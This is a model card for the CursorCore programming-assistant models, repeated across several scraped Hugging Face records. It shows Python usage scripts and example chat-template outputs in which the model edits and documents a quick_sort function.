library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2"). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3)
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework of AI-assisted programming task. It is designed for aligning anything during programming process, used for the implementation of features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We create a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-QW2.5-1.5B-LC-AWQ | TechxGenus | 2024-10-10T06:42:18Z | 78 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-QW2.5-1.5B-LC",
"base_model:quantized:TechxGenus/CursorCore-QW2.5-1.5B-LC",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"awq",
"region:us"
] | text-generation | 2024-10-06T14:22:17Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-QW2.5-1.5B-LC
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2"). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3)
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework of AI-assisted programming task. It is designed for aligning anything during programming process, used for the implementation of features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We create a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-QW2.5-1.5B-LC-GPTQ | TechxGenus | 2024-10-10T06:42:15Z | 78 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-QW2.5-1.5B-LC",
"base_model:quantized:TechxGenus/CursorCore-QW2.5-1.5B-LC",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"gptq",
"region:us"
] | text-generation | 2024-10-08T04:54:37Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-QW2.5-1.5B-LC
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2"). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3)
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework of AI-assisted programming task. It is designed for aligning anything during programming process, used for the implementation of features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
